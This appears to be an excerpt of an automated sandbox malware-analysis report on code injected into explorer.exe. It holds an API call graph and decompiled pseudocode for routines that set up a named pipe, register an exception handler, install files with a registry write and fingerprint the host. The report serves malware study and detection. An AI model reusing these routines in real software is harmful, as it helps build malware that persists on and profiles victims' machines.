_ftol2_sse 11319->11320 11321 82f1d 11320->11321 11322 82f52 CreateWindowExA 11321->11322 11324 82f9b 11321->11324 11323 82f83 ShowWindow 11322->11323 11322->11324 11323->11324 11324->11313 11326 832b7 ConnectNamedPipe 11325->11326 11327 832d0 GetLastError 11326->11327 11337 832e1 11326->11337 11328 834c2 11327->11328 11327->11337 11328->11313 11329 834a8 GetLastError 11330 834ae DisconnectNamedPipe 11329->11330 11330->11326 11330->11328 11334 89749 SetLastError SetLastError 11334->11337 11335 8c319 RtlAllocateHeap HeapFree memset FlushFileBuffers 11335->11337 11336 81da0 62 API calls 11336->11337 11337->11329 11337->11330 11337->11334 11337->11335 11337->11336 11338 891a6 RtlAllocateHeap 11337->11338 11345 893be 11337->11345 11351 88604 RtlAllocateHeap 11337->11351 11352 894b7 11337->11352 11358 896ca 11337->11358 11338->11337 11364 86da0 11340->11364 11343 894b7 2 API calls 11344 825f4 11343->11344 11344->11313 11347 893d2 11345->11347 11362 88604 RtlAllocateHeap 11347->11362 11348 894a1 11348->11337 11350 8942a 11350->11348 11363 88604 RtlAllocateHeap 11350->11363 11351->11337 11353 89503 11352->11353 11357 894c8 11352->11357 11353->11337 11354 894fa 11355 8861a 2 API calls 11354->11355 11355->11353 11356 8861a 2 API calls 11356->11357 11357->11353 11357->11354 11357->11356 11359 896d6 11358->11359 11360 896fb 11359->11360 11361 896ef memset 11359->11361 11360->11337 11361->11360 11362->11350 11363->11350 11365 89ed0 7 API calls 11364->11365 11366 86dc0 11365->11366 11367 825e9 11366->11367 11368 86de2 11366->11368 11386 8edcf 11366->11386 11367->11343 11370 892e5 2 API calls 11368->11370 11379 86dff 11370->11379 11371 8a471 3 API calls 11371->11379 11372 86ed7 11374 8861a 2 API calls 11372->11374 11374->11367 11376 8980c GetSystemTimeAsFileTime 11376->11379 11377 89ed0 7 API calls 11377->11379 11379->11367 11379->11371 11379->11372 11379->11376 11379->11377 11380 86e8f 11379->11380 11395 8b269 GetFileAttributesW 11379->11395 11396 8f14f 11379->11396 11409 8a4ef 11379->11409 11416 81c68 11379->11416 11380->11379 11382 8980c GetSystemTimeAsFileTime 11380->11382 11383 8b1b1 13 API calls 11380->11383 11384 89640 2 API calls 11380->11384 11382->11380 11383->11380 11385 86eac MoveFileW 11384->11385 11385->11379 11387 895e1 RtlAllocateHeap 11386->11387 11388 8ede1 11387->11388 11389 89256 2 API calls 11388->11389 11390 8edee 11389->11390 11391 8ee0f 11390->11391 11392 892e5 2 API calls 11390->11392 11391->11368 11393 8ee04 11392->11393 11394 885d5 2 API calls 11393->11394 11394->11391 11395->11379 11431 8efe9 11396->11431 11400 8861a 2 API calls 11401 8f236 11400->11401 11401->11379 11402 8f186 11403 8a5f7 CreateFileW 11402->11403 11408 8f228 11402->11408 11404 8f1f8 11403->11404 11405 8a65c WriteFile 11404->11405 11406 8f20a 11404->11406 11405->11406 11407 8861a 2 API calls 11406->11407 11407->11408 11408->11400 11410 895e1 RtlAllocateHeap 11409->11410 11411 8a4fe 11410->11411 11534 8b269 GetFileAttributesW 11411->11534 11413 8a508 11414 885d5 2 API calls 11413->11414 11415 8a513 11414->11415 11415->11379 11427 81c83 11416->11427 11417 81ce8 11418 8a6a9 6 API calls 11417->11418 11420 81d06 11418->11420 11419 8980c GetSystemTimeAsFileTime 11419->11427 11422 81d1a GetCurrentProcess GetCurrentThread GetCurrentProcess DuplicateHandle 11420->11422 11428 81d10 11420->11428 11421 81d15 11421->11379 11423 8980c GetSystemTimeAsFileTime 11422->11423 11424 81d46 11423->11424 11535 81a1b 11424->11535 11427->11417 11427->11419 11427->11421 11430 8861a 2 API calls 11428->11430 11429 89f06 6 API calls 11429->11428 11430->11421 11432 8f015 11431->11432 11433 895e1 RtlAllocateHeap 11432->11433 11435 8f06e 11432->11435 11434 8f023 11433->11434 11436 892e5 2 API calls 11434->11436 11438 895e1 RtlAllocateHeap 11435->11438 11460 8f0e1 11435->11460 11439 8f03a 11436->11439 11437 8aeb4 18 API calls 11440 8f0fe 11437->11440 11441 8f092 11438->11441 11442 885d5 2 API calls 11439->11442 11443 892e5 2 API calls 11440->11443 11444 892e5 2 API calls 11441->11444 11445 8f048 11442->11445 11446 8f11d 11443->11446 11447 8f0ad 11444->11447 11445->11435 11471 8aeb4 11445->11471 11449 8f13c 11446->11449 11484 8ef2e 11446->11484 11450 885d5 2 API calls 11447->11450 11449->11401 11461 8f6c0 11449->11461 11453 8f0bb 11450->11453 11456 8aeb4 18 API calls 11453->11456 11453->11460 11454 8861a 2 API calls 11454->11435 11458 8f0d3 11456->11458 11457 8861a 2 API calls 11457->11449 11459 8861a 2 API calls 11458->11459 11459->11460 11460->11437 11493 88604 RtlAllocateHeap 11461->11493 11463 8f6e0 11470 8f778 11463->11470 11494 94410 11463->11494 11465 8861a 2 API calls 11466 8f796 11465->11466 11466->11402 11468 88698 3 API calls 11469 8f70b 11468->11469 11469->11468 11469->11470 11497 93830 11469->11497 11470->11465 11472 892e5 RtlAllocateHeap lstrcatW 11471->11472 11473 8aecf 11472->11473 11474 8b00b 11473->11474 11475 8aedd FindFirstFileW 11473->11475 11474->11454 11476 8aff7 11475->11476 11482 8aef6 11475->11482 11477 8861a HeapFree memset 11476->11477 11477->11474 11478 8afde FindNextFileW 11478->11476 11478->11482 11479 892e5 RtlAllocateHeap lstrcatW 11479->11482 11480 8efaa 16 API calls 11480->11482 11481 8aeb4 16 API calls 11481->11482 11482->11478 11482->11479 11482->11480 11482->11481 11483 8861a HeapFree memset 11482->11483 11483->11482 11485 8ee1c 6 API calls 11484->11485 11486 8ef49 11485->11486 11487 8ef50 11486->11487 11488 8b1b1 13 API calls 11486->11488 11487->11457 11489 8ef5c 11488->11489 11490 88698 RtlAllocateHeap HeapFree memset 11489->11490 11491 8ef71 11489->11491 11490->11491 11492 8861a HeapFree memset 11491->11492 11492->11487 11493->11463 11495 941d0 memset 11494->11495 11496 9442c 11495->11496 11496->11469 11498 93841 11497->11498 11499 94af0 memcpy 11498->11499 11500 938ea 11498->11500 11504 9389e 11498->11504 11499->11504 11500->11469 11504->11500 11505 93908 11504->11505 11517 94af0 memcpy 11504->11517 11505->11500 11517->11505 11534->11413 11536 81a3c 11535->11536 11537 81a82 11535->11537 11554 89ea5 11536->11554 11538 81aac 11537->11538 11557 8160d 11537->11557 11544 81ab4 11538->11544 11568 81778 11538->11568 11543 89e66 7 API calls 11546 81a50 11543->11546 11544->11428 11544->11429 11545 81a6e 11548 8861a 2 API calls 11545->11548 11546->11545 11550 896ca memset 11546->11550 11548->11537 11550->11545 11555 89f95 7 API calls 11554->11555 11556 81a44 11555->11556 11556->11543 11558 8980c GetSystemTimeAsFileTime 11557->11558 11559 81628 11558->11559 11560 8980c GetSystemTimeAsFileTime 11559->11560 11561 81630 11560->11561 11562 898ee 66 API calls 11561->11562 11565 81655 11562->11565 11563 8980c GetSystemTimeAsFileTime 11563->11565 11564 816a0 11566 8984a HeapFree memset 11564->11566 11565->11563 11565->11564 11567 8165d 11565->11567 11566->11567 11567->11538 11569 89f95 7 API calls 11568->11569 11570 817c0 11569->11570 11571 817dd 11570->11571 11573 816ee RtlAllocateHeap HeapFree memset 11570->11573 11572 8861a HeapFree memset 11571->11572 11574 817f3 11572->11574 11573->11571 11575 81080 RtlAllocateHeap 11574->11575 11576 817fd 11575->11576 11577 8a51a RtlAllocateHeap _ftol2_sse 11576->11577 11578 81818 11577->11578 11602 8bb37 11601->11602 11603 8bb56 11602->11603 11604 895e1 RtlAllocateHeap 11602->11604 11603->11223 11605 8bb65 lstrcmpiW 11604->11605 11606 8bb7b 11605->11606 11607 885d5 2 API calls 11606->11607 11607->11603 11608->11229 11613 8bd5e 11609->11613 11610 8bde8 SetEntriesInAclA 11611 8bdfe LocalAlloc 11610->11611 11612 83210 CreateNamedPipeA 11610->11612 11611->11612 11614 8be0e 11611->11614 11612->11234 11612->11238 11613->11610 11613->11612 11614->11612 11616 895e1 RtlAllocateHeap 11615->11616 11620 8bca0 11616->11620 11617 8bcf3 11618 885d5 2 API calls 11617->11618 11619 83268 11618->11619 11619->11237 11620->11617 11621 8bcd9 SetSecurityInfo 11620->11621 11621->11617 11623 82905 11622->11623 11625 8291c 11622->11625 11624 88698 3 API calls 11623->11624 11624->11625 11625->11244 11627 82a5f 11626->11627 11628 82a6a atol 11627->11628 11633 82a65 11627->11633 11629 82a81 11628->11629 11630 89749 2 API calls 11629->11630 11629->11633 11631 82a97 11630->11631 11632 89749 2 API calls 11631->11632 11632->11633 11633->11249 11679 8378c 11634->11679 11637 8896f 7 API calls 11638 8418c 11637->11638 11639 88a90 3 API calls 11638->11639 11642 84197 11638->11642 11640 841b3 11639->11640 11640->11642 11685 88604 RtlAllocateHeap 11640->11685 11641 84397 11645 8861a 2 API calls 11641->11645 11642->11641 11644 88cc0 6 API calls 11642->11644 11644->11641 11646 843a2 11645->11646 11646->11260 11647 84356 11647->11642 11648 893be RtlAllocateHeap 11652 84201 11648->11652 11650 89749 SetLastError SetLastError 11650->11652 11651 88669 RtlAllocateHeap 11651->11652 11652->11642 11652->11647 11652->11648 11652->11650 11652->11651 11653 894b7 HeapFree memset 11652->11653 11653->11652 11680 837b6 11679->11680 11686 890a5 11680->11686 11683 892e5 2 API calls 11684 83816 11683->11684 11684->11637 11685->11652 11687 8902d _ftol2_sse 11686->11687 11688 837ea 11687->11688 11688->11683

                  Executed Functions

                  Function 000831C2, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E000831C2(void* __edx, void* __eflags) {
				CHAR* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v20;
				signed int _t10;
				intOrPtr _t11;
				intOrPtr _t12;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t22;
				intOrPtr _t28;
				void* _t38;
				CHAR* _t40;

				_t38 = __edx;
				_t28 =  *0x9e688; // 0xb0000
				_t10 = E0008C292( *((intOrPtr*)(_t28 + 0xac)), __eflags);
				_t40 = _t10;
				_v8 = _t40;
				if(_t40 != 0) {
					_t11 = E00088604(0x80000); // executed
					 *0x9e724 = _t11;
					__eflags = _t11;
					if(_t11 != 0) {
						_t12 = E0008BD10(); // executed
						_v16 = _t12;
						__eflags = _t12;
						if(_t12 != 0) {
							_push(0xc);
							_pop(0);
							_v12 = 1;
						}
						_v20 = 0;
						__eflags = 0;
						asm("sbb eax, eax");
						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
						 *0x9e674 = _t16;
						__eflags = _t16 - 0xffffffff;
						if(_t16 != 0xffffffff) {
							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0xe7f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}
















                  0x000831c2
                  0x000831c8
                  0x000831d8
                  0x000831dd
                  0x000831df
                  0x000831e4
                  0x000831f5
                  0x000831fa
                  0x00083200
                  0x00083202
                  0x0008320b
                  0x00083210
                  0x00083213
                  0x00083215
                  0x00083217
                  0x00083219
                  0x0008321a
                  0x0008321a
                  0x00083227
                  0x0008322a
                  0x0008322f
                  0x00083249
                  0x0008324f
                  0x00083254
                  0x00083257
                  0x00083263
                  0x00083271
                  0x00083278
                  0x0008327a
                  0x00000000
                  0x00000000
                  0x0008327c
                  0x00083287
                  0x0008328a
                  0x00000000
                  0x00083259
                  0x00083259
                  0x0008325f
                  0x0008328c
                  0x0008328c
                  0x0008328d
                  0x00083293
                  0x00000000
                  0x0008329c
                  0x00083257
                  0x00083204
                  0x00000000
                  0x00083204
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: bc4761a8c3dba75cfbbf9e902f88b9dc398174ab3aa94a734f8109b69a119731
                  • Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
                  • Opcode Fuzzy Hash: bc4761a8c3dba75cfbbf9e902f88b9dc398174ab3aa94a734f8109b69a119731
                  • Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0xe7f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}






                  0x00085a61
                  0x00085a6d
                  0x00085a73
                  0x00085a7a

                  APIs
                  • RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: ExceptionHandlerVectored
                  • String ID:
                  • API String ID: 3310709589-0
                  • Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                  • Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
                  • Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
                  • Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00084A0B, Relevance: 9.3, APIs: 6, Instructions: 285stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 79%
                  			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0xe7fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x9e684; // 0xe7f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0xe7f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}
































































                  0x00084a0b
                  0x00084a18
                  0x00084a23
                  0x00084a28
                  0x00084a2a
                  0x00084a2d
                  0x00084a32
                  0x00084a35
                  0x00084a3f
                  0x00084a41
                  0x00084a4e
                  0x00084a57
                  0x00084a57
                  0x00084a64
                  0x00084a7f
                  0x00084a86
                  0x00084a88
                  0x00084a8d
                  0x00084a92
                  0x00084a98
                  0x00084aa7
                  0x00084ac6
                  0x00084ac8
                  0x00084ace
                  0x00084ad4
                  0x00084ad9
                  0x00084add
                  0x00084ae0
                  0x00084aea
                  0x00084aec
                  0x00084aed
                  0x00084af8
                  0x00084afa
                  0x00084afd
                  0x00084b02
                  0x00084b09
                  0x00084b5e
                  0x00084b5e
                  0x00084b63
                  0x00084bca
                  0x00084bcf
                  0x00084bd1
                  0x00084bdb
                  0x00084be0
                  0x00084be0
                  0x00084bf5
                  0x00084bfa
                  0x00084bfc
                  0x00084bff
                  0x00084c01
                  0x00000000
                  0x00000000
                  0x00084c07
                  0x00084c11
                  0x00084c1a
                  0x00084c1f
                  0x00084c22
                  0x00084c28
                  0x00084c2e
                  0x00084c36
                  0x00084c38
                  0x00084c3b
                  0x00084c3c
                  0x00084c41
                  0x00084c44
                  0x00084c47
                  0x00084c49
                  0x00084c4d
                  0x00084c4d
                  0x00084c52
                  0x00084c55
                  0x00084c57
                  0x00084c5b
                  0x00084c5b
                  0x00084c62
                  0x00084c67
                  0x00084c69
                  0x00084c6d
                  0x00084c6f
                  0x00084c75
                  0x00084c79
                  0x00084c7c
                  0x00084c7d
                  0x00084c82
                  0x00084c85
                  0x00084c8a
                  0x00084cb2
                  0x00084cb8
                  0x00084cbf
                  0x00084cce
                  0x00084cd3
                  0x00000000
                  0x00084cd3
                  0x00084cc1
                  0x00000000
                  0x00084c8c
                  0x00084c8c
                  0x00084c91
                  0x00084c98
                  0x00084cdd
                  0x00084cdd
                  0x00084ce4
                  0x00084ce8
                  0x00084ce9
                  0x00084ce9
                  0x00084cf3
                  0x00084cf8
                  0x00084cfb
                  0x00084cfc
                  0x00084cfe
                  0x00084d00
                  0x00084d05
                  0x00084d0c
                  0x00084d4f
                  0x00084d0e
                  0x00084d13
                  0x00084d1b
                  0x00084d1f
                  0x00084d2a
                  0x00084d35
                  0x00084d3d
                  0x00084d41
                  0x00084d49
                  0x00084d49
                  0x00084d0c
                  0x00084d55
                  0x00084d58
                  0x00084d5a
                  0x00084d60
                  0x00084d60
                  0x00084d62
                  0x00084d62
                  0x00000000
                  0x00084d62
                  0x00084c9a
                  0x00084c9a
                  0x00084ca0
                  0x00084ca2
                  0x00084ca7
                  0x00084ca7
                  0x00084ca9
                  0x00084cd8
                  0x00000000
                  0x00084cd8
                  0x00084cab
                  0x00084ae4
                  0x00084ae4
                  0x00000000
                  0x00084ae4
                  0x00084c8a
                  0x00084b69
                  0x00084b77
                  0x00084b8a
                  0x00084b8f
                  0x00084b95
                  0x00084b97
                  0x00084baf
                  0x00084bb4
                  0x00084bbd
                  0x00084bc3
                  0x00000000
                  0x00084bc3
                  0x00084b9f
                  0x00084ba8
                  0x00000000
                  0x00084ba8
                  0x00084b0b
                  0x00084b11
                  0x00084b13
                  0x00084b51
                  0x00084b53
                  0x00000000
                  0x00000000
                  0x00084b55
                  0x00084b59
                  0x00000000
                  0x00084b59
                  0x00084b15
                  0x00084b1f
                  0x00084b2b
                  0x00084b36
                  0x00084b3d
                  0x00084b47
                  0x00084b4c
                  0x00000000
                  0x00084b4c
                  0x00084ae2
                  0x00000000
                  0x00084a66
                  0x00084a71
                  0x00084a77
                  0x00084a79
                  0x00084d64
                  0x00084d64
                  0x00084d66
                  0x00084d6c
                  0x00084d6c
                  0x00000000
                  0x00084a79

                  APIs
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: lstrcat$lstrcpy$memset
                  • String ID:
                  • API String ID: 1985475764-0
                  • Opcode ID: 2356931df70684d658a479f44f219f8e37a5c690f67de42f2680c086677cbb3c
                  • Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
                  • Opcode Fuzzy Hash: 2356931df70684d658a479f44f219f8e37a5c690f67de42f2680c086677cbb3c
                  • Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  C-Code - Quality: 94%
                  			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}















                  0x0008b7a8
                  0x0008b7b1
                  0x0008b7bd
                  0x0008b7c3
                  0x0008b7c5
                  0x0008b7cd
                  0x0008b7e0
                  0x0008b7ef
                  0x0008b7fa
                  0x0008b807
                  0x0008b821
                  0x0008b826
                  0x0008b828
                  0x0008b82f
                  0x0008b83f
                  0x0008b850
                  0x0008b85a
                  0x0008b862
                  0x0008b869
                  0x0008b86c
                  0x0008b889

                  APIs
                  • memset.MSVCRT ref: 0008B7C5
                  • GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
                  • lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
                  • GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821
                    • Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D
                  • lstrcatW.KERNEL32 ref: 0008B85A
                  • CharUpperBuffW.USER32(?,00000000), ref: 0008B86C
                  Memory Dump Source
                  • Source File: 00000006.00000002.869764061.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_6_2_80000_explorer.jbxd
                  Similarity
                  • API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
                  • String ID:
                  • API String ID: 3410906232-0
                  • Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
                  • Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
                  • Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 000861B4, Relevance: 7.6, APIs: 5, Instructions: 145registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
